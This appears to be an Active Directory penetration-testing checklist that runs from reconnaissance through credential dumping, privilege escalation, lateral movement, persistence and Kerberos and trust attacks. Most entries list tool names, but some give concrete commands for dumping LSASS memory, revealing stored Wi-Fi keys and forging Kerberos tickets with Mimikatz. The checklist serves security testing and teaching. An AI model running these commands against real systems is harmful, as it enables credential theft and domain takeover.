Skip to content

Active Directory

I. Reconnaissance & Enumeration (Pre-Compromise)

  • External Reconnaissance:
    • Identify domain names and subdomains (OSINT, DNSdumpster, Sublist3r)
    • Gather employee names and email addresses (OSINT, Hunter.io, theHarvester)
    • Identify publicly exposed services (Nmap, Shodan)
    • Search for leaked credentials (Have I Been Pwned, DeHashed)
  • Internal Network Mapping (Assuming Initial Access to a Network Point):
    • Identify live hosts (Nmap, Ping, ARP scans)
    • Port scan identified hosts (Nmap, Masscan)
    • Identify running services and versions (Nmap -sV)
  • LDAP Enumeration (Anonymous or Authenticated):
    • Identify Domain Controllers (nltest /dclist:, Nmap LDAP scripts, ADExplorer)
    • Enumerate domain information (ldapsearch, ADExplorer, PowerView)
    • Enumerate users (ldapsearch, PowerView Get-NetUser)
    • Enumerate groups (ldapsearch, PowerView Get-NetGroup)
    • Enumerate computers (ldapsearch, PowerView Get-NetComputer)
    • Enumerate OUs (ldapsearch, ADExplorer)
    • Enumerate Group Policies (PowerView Get-NetGPO)
    • Enumerate ACLs on objects (PowerView Get-ObjectAcl, dsacls)
    • Identify domain trusts (nltest /domain_trusts, PowerView Get-NetDomainTrust)
    • Identify sites and subnets (nltest /siteget, PowerView Get-NetSite)
    • Check for LDAP signing (Nmap ldap-security script, LdapRelayScan)
  • SMB Enumeration:
    • List shares (Nmap smb-enum-shares, CrackMapExec, smbclient)
    • Check for NULL sessions (rpcclient -U "" -N, enum4linux)
    • Enumerate users via SAMR (enum4linux, CrackMapExec --rid-brute)
    • Enumerate domain policies (enum4linux)
  • DNS Enumeration:
    • Identify internal DNS servers
    • Attempt zone transfers (dig axfr, nslookup ls -d)
    • Enumerate DNS records (dnsrecon, Nmap dns-brute)
    • Check for ADIDNS stale records (ADIDNSDump)
  • RPC/MSRPC Enumeration:
    • Enumerate RPC endpoints (rpcdump.py)
    • Gather information via specific MSRPC interfaces
  • Kerberos Enumeration:
    • Identify KDC (Key Distribution Center)
    • User enumeration via Kerberos (Kerbrute userenum, nmap script krb5-enum-users)
  • NTP Enumeration:
    • Identify NTP servers (ntpq -p, nmap ntp-info)
  • BloodHound Data Collection:
    • Run SharpHound collector (BloodHound GUI, PowerShell ingestor)
    • Analyze data for attack paths (BloodHound GUI)

II. Initial Compromise

  • Password Spraying:
    • Target common usernames with weak/common passwords (CrackMapExec, MSF auxiliary/scanner/smb/smb_login)
  • AS-REP Roasting:
    • Identify users with "Do not require Kerberos preauthentication" set (PowerView Get-DomainUser -PreauthNotRequired, Rubeus asreproast)
    • Crack AS-REP hashes (Hashcat, John the Ripper)
  • LLMNR/NBT-NS/mDNS Poisoning:
    • Listen for and spoof name resolution requests (Responder, Inveigh)
    • Relay captured hashes (ntlmrelayx.py) or crack them (Hashcat, John the Ripper)
  • SMB Relay Attacks:
    • Relay SMB authentication to other machines (ntlmrelayx.py)
    • Target machines with SMB signing disabled (Responder, nmap smb-security-mode)
  • Printer Spooler (PrintNightmare & variants - CVE-2021-34527, CVE-2021-1675):
    • Check for vulnerable spooler service (Rpcclient, various exploit scripts)
  • PetitPotam (MS-EFSRPC):
    • Coerce machine account authentication (PetitPotam.py)
    • Combine with AD CS for NTLM relay (if applicable)
  • Exploiting Known Vulnerabilities:
    • Scan for unpatched systems (Nessus, OpenVAS, Nmap NSE scripts)
    • Target specific CVEs (e.g., Zerologon - CVE-2020-1472, MS17-010 EternalBlue)
  • Phishing/Spear Phishing:
    • Deliver malicious payloads (executables, documents with macros, links)
  • Web Application Vulnerabilities (on domain-joined servers):
    • Test for common web vulns (SQLi, XSS, RCE)
  • Default/Weak Credentials in Services:
    • Check common services (Tomcat, JBoss, Jenkins, etc.)

III. Credential Dumping & Hash Cracking

  • LSASS Dumping:
    • Mimikatz (sekurlsa::logonpasswords, sekurlsa::msv, sekurlsa::tspkg, sekurlsa::wdigest)
    • ProcDump (procdump -ma lsass.exe lsass.dmp)
    • Task Manager (right-click lsass.exe -> Create dump file)
    • comsvcs.dll MiniDump (rundll32 C:\windows\system32\comsvcs.dll MiniDump <LSASS_PID> C:\temp\lsass.dmp full)
  • SAM/SYSTEM Hive Extraction (Offline):
    • Extract from Volume Shadow Copies
    • Extract from backups
    • Use tools like secretsdump.py, pwdump
  • NTDS.dit Extraction (Domain Controller):
    • Use ntdsutil.exe (ifm - create full)
    • Volume Shadow Copy methods (vssadmin, diskshadow)
    • secretsdump.py (remote extraction)
    • Parse with tools like Impacket's secretsdump.py, Quarks PwDump
  • LSA Secrets:
    • Mimikatz (lsadump::secrets)
    • secretsdump.py
  • DPAPI (Data Protection API):
    • Extract DPAPI master keys (Mimikatz dpapi::masterkey)
    • Decrypt DPAPI protected secrets (SharpDPAPI, DonPAPI)
  • Browser Passwords/Cookies:
    • LaZagne, SharpWeb, BrowseHistoryView
  • Credentials in Files/Registry:
    • GPP Passwords (SYSVOL group.xml files - PowerSploit Get-GPPPassword, SharpGPOAbuse)
    • Unattend.xml files
    • Web.config files
    • PowerShell transcripts
    • Registry (e.g., WinSCP, VNC passwords)
  • Wireless Network Keys:
    • netsh wlan show profiles key=clear
  • Hash Cracking:
    • Tools: Hashcat, John the Ripper
    • Target: NTLM, NTLMv2, Kerberos tickets, LM

IV. Local Privilege Escalation (Windows)

  • Kernel Exploits:
    • Check OS version and patch level (systeminfo)
    • Search for known exploits (Sherlock, Watson, Windows Exploit Suggester)
  • Insecure Service Permissions:
    • Writable service binaries (accesschk.exe, PowerUp Get-ModifiableServiceFile)
    • Modifiable service configuration (accesschk.exe, PowerUp Get-ModifiableService)
    • Unquoted Service Paths (PowerUp Get-UnquotedService, wmic service get name,pathname,startname | findstr /i "program files" | findstr /i /v """)
  • DLL Hijacking:
    • Identify missing DLLs loaded by privileged processes (ProcMon)
    • Check for writable directories in PATH
  • AlwaysInstallElevated:
    • Check registry keys: HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated (reg query)
  • Scheduled Tasks:
    • Writable task files/actions (accesschk.exe, schtasks /query /v /fo LIST)
    • Tasks running as SYSTEM with modifiable binaries
  • Startup Applications:
    • Writable startup application paths/binaries (accesschk.exe)
  • Registry Misconfigurations:
    • Autoruns keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run, etc.) - check permissions (accesschk.exe)
    • Weak permissions on HKLM\SYSTEM\CurrentControlSet\Services keys
  • Credential Manager / Stored Credentials:
    • cmdkey /list
    • Mimikatz (vault::cred, token::elevate then vault::cred)
  • Token Impersonation/Theft:
    • Incognito (MSF Meterpreter), Mimikatz (token::*)
    • Identify privileged tokens (Get-Process -IncludeUserName | Select-Object -ExpandProperty UserName)
  • Potato Attacks (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege):
    • RottenPotato, JuicyPotato, SweetPotato, GenericPotato (check for required privileges: whoami /priv)
  • Password Mining from Memory/Files (already covered in Credential Dumping):
    • Look for passwords in configuration files, scripts, memory dumps
  • Group Policy Preferences (GPP) Passwords (local):
    • If GPP files were cached locally with cpassword
  • Named Pipe Impersonation:
    • Exploit vulnerable named pipe servers
  • Abusing Privileges:
    • SeBackupPrivilege (robocopy /B, diskshadow, SharpBackup)
    • SeRestorePrivilege
    • SeTakeOwnershipPrivilege (takeown.exe)
    • SeDebugPrivilege (already heavily used by tools like Mimikatz)
    • SeLoadDriverPrivilege (Capcom.sys exploit, KDU)
    • SeCreateTokenPrivilege
    • SeTcbPrivilege
  • Hot Potato/Rotten Potato NG/PrintSpoofer:
    • When specific privileges (SeImpersonate, SeAssignPrimaryToken) are available.

V. Lateral Movement

  • Pass-the-Hash (PtH):
    • Use NTLM hashes to authenticate (Mimikatz sekurlsa::pth, CrackMapExec, Impacket's psexec.py/smbexec.py/wmiexec.py with -hashes)
  • Pass-the-Ticket (PtT):
    • Use Kerberos tickets (TGTs, TGSs) to authenticate (Mimikatz kerberos::ptt, Rubeus ptt)
    • Requires LSASS access or exported tickets
  • Over-Pass-the-Hash (OPtH) / Pass-the-Key:
    • Use AES keys (from Kerberos) instead of NTLM hashes (Mimikatz sekurlsa::pth /kdc, Rubeus asktgs /aeskey)
  • SMB/PsExec:
    • Execute commands remotely (psexec.exe, CrackMapExec, Impacket's psexec.py, smbexec.py)
  • Windows Management Instrumentation (WMI):
    • Execute commands remotely (wmic.exe, CrackMapExec, Impacket's wmiexec.py, PowerSploit Invoke-WmiCommand)
  • WinRM / PowerShell Remoting:
    • Execute PowerShell commands remotely (Enter-PSSession, Invoke-Command)
    • Check if WinRM is enabled (Test-WSMan)
  • Remote Desktop Protocol (RDP):
    • Connect with valid credentials (mstsc.exe, rdesktop, xfreerdp)
    • RDP session hijacking (tscon)
  • Scheduled Tasks (Remote):
    • Create/modify tasks on remote systems (schtasks /s <target> /create, Invoke-ATHRemote)
  • DCOM Objects:
    • Utilize DCOM applications for remote execution (e.g., MMC20.Application, ShellBrowserWindow)
  • Exploiting Trust Relationships:
    • Move between domains/forests via trust keys (inter-realm TGT, Mimikatz lsadump::trust /patch)
  • Resource-Based Constrained Delegation (RBCD):
    • If you compromise an account/computer that has msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer.
    • Forge S4U2self/S4U2proxy tickets (Rubeus s4u)
  • Distributed File System (DFS):
    • Identify DFS shares and target linked servers.

VI. Domain Dominance & Persistence

  • Golden Ticket Attack:
    • Forge a Kerberos TGT for any user with any privileges (Mimikatz kerberos::golden)
    • Requires krbtgt account NTLM hash/AES key
  • Silver Ticket Attack:
    • Forge a Kerberos TGS for a specific service on a specific server (Mimikatz kerberos::golden /service /server /user /id (SPN's RID))
    • Requires service account NTLM hash/AES key (e.g., CIFS, HOST, RPCSS)
  • Skeleton Key:
    • Patch LSASS on DCs to allow a master password for all users (Mimikatz misc::skeleton)
    • Requires DA privileges and LSASS access on DC
  • DSRM (Directory Services Restore Mode) Password Synchronization:
    • Synchronize DSRM password with a domain admin account for backdoor access (Mimikatz lsadump::setntlm)
  • AdminSDHolder:
    • Modify AdminSDHolder object permissions to grant persistence to protected groups (PowerView Set-ObjectACL)
  • Domain Controller Synchronization Rights (DCsync):
    • Grant an account the rights to replicate directory changes (Mimikatz lsadump::dcsync)
    • Requires "Replicating Directory Changes" and "Replicating Directory Changes All" permissions
  • SID History:
    • Add a known SID (e.g., Domain Admins SID) to an account's SID history (Mimikatz sid::patch)
  • Group Policy Abuse:
    • Modify GPOs to deploy software, run scripts, change local admin groups (Group Policy Management Console, SharpGPOAbuse)
  • Scheduled Tasks on DCs:
    • Create persistent tasks on Domain Controllers
  • Service Creation on DCs:
    • Create persistent services on Domain Controllers (sc.exe create)
  • Active Directory Certificate Services (AD CS) Abuse:
    • ESC1-ESC8 vulnerabilities (Certify, Certipy)
    • Forge certificates for authentication (Rubeus ask /certificate)
  • Shadow Credentials (msDS-KeyCredentialLink):
    • Add a key credential to a target object (e.g., computer account) to authenticate as it (Whisker, NTLMRelayToADCS + ShadowCoerce)
  • DPAPI Domain Backup Keys:
    • Extract DPAPI domain backup keys from a DC to decrypt user DPAPI blobs (Mimikatz lsadump::backupkeys)
  • Modifying SACLs/ACLs:
    • Modify System Access Control Lists or ACLs on critical objects for stealth or re-entry.
  • DNS Admin Privileges:
    • If a user is part of DnsAdmins group, can load arbitrary DLL into DNS service running as SYSTEM (dnscmd.exe /config /serverlevelplugindll)
  • Backdooring LAPS:
    • If LAPS is used, gain permissions to read LAPS passwords.

VII. Specific Kerberos Attacks

  • Kerberoasting:
    • Request TGS for service accounts (GetUserSPNs.py, PowerView Get-NetUser -SPN | Get-KerberoastableUser, Rubeus kerberoast)
    • Crack service account hashes offline (Hashcat, John the Ripper)
  • AS-REP Roasting (already listed):
    • Target users without Kerberos pre-authentication
  • Unconstrained Delegation:
    • Identify hosts with unconstrained delegation (PowerView Get-NetComputer -Unconstrained, BloodHound)
    • Coerce authentication to these hosts (PrinterBug, PetitPotam) to capture TGTs of users authenticating to them (Mimikatz on the unconstrained host)
  • Constrained Delegation (Traditional & RBCD):
    • Identify accounts/computers configured for constrained delegation (PowerView, BloodHound)
    • If S4U2Self is enabled, can impersonate users to services the account is delegated to (Rubeus s4u)
    • For RBCD, see Lateral Movement section.
  • "NoPAC" / SAM Account Name Spoofing (CVE-2021-42278 & CVE-2021-42287):
    • Combine machine account rename with KDC SPN processing flaw for privilege escalation (exploit scripts available)
  • Diamond Ticket (Modifying TGT):
    • Modify an existing TGT (e.g., change user ID, groups) if krbtgt key is known (requires specialized tools beyond standard Mimikatz golden ticket command, conceptually related).
  • Sapphire Ticket (Pass-the-Cache with PAC modification):
    • Injecting a PAC from one user into another's TGT/TGS.

VIII. Forest & Trust Attacks

  • Trust Ticket Abuse:
    • Forge inter-realm TGTs if trust keys are compromised (Mimikatz lsadump::trust /patch, then kerberos::golden for cross-trust)
  • SID History on Trust Accounts:
    • Exploit SID history on forest trust accounts.
  • Exploiting Weak Trust Configurations:
    • Identify trusts with weak security settings (e.g., SID filtering disabled).
  • Abusing **krbtgt** account synchronization across trusts.